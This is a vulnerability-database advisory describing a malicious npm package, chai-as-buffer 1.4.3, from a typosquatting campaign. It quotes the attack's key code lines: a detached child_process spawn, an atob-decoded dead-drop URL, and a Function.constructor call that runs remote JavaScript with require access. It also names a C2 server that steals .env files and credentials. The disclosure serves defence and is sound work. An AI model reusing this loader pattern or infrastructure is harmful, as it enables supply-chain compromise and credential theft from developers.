VDB
GCVE-110-OSM-2026-3458
GCVE-110-OSM-2026-3458
Advisory PublishedCVSS 9.6/10
Executes attacker-controlled JavaScript with full Node.js require() access via a npoint.io dead-drop: lib/initializeCaller.js base64-decodes a hardcoded C2 URL, fetches the payload, and runs the response .cookie field through Function.constructor injection. A detached background process ensures the payload survives parent process exit. Second-stage C2 at 107.189.20.11 establishes a persistent socket.io connection and exfiltrates .env files and system credentials (USER, USERNAME). One of six confirmed packages in a multi-publisher campaign using lookalike chai-* plugin names.
**Trigger** (require-time): index.js exports a middleware function; on invocation it calls runBackgroundTask(), which executes child_process.spawn('node', ['lib/initializeCaller.js'], { detached: true, stdio: 'ignore' }) followed by child.unref() — the malicious process is fully detached and independent.
**Stage 1 — Dead-drop fetch**: lib/initializeCaller.js contains an immediately-invoked async function. It calls atob("aHR0cHM6Ly9hcGkubnBvaW50LmlvLzA1MWQwYTk2ZjZlOTFhYjM0YTQx") to recover https://api.npoint.io/051d0a96f6e91ab34a41, then fetches it via axios.get().
**Stage 1 — RCE**: The JSON response .cookie field is executed as JavaScript via new Function.constructor("require", res.data.cookie)(require), granting the remotely-hosted payload full Node.js require() access.
**Stage 2 — C2 and credential theft**: The delivered payload connects to 107.189.20.11 via socket.io for persistent C2. It reads process.env.USER, process.env.USERNAME, and the .env file from the victim's working directory. Additional capabilities: spawn, execSync, cmd.exe execution.
**Camouflage**: Package body is a copy of pino logger source. Phantom dependency parse-json is declared but never imported — a consistent fingerprint across campaign siblings.
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | chai-as-buffer | 1.4.3 (affected) | — |
Browse GCVE Records
73,442 records in the GCVE database · Updated July 17, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.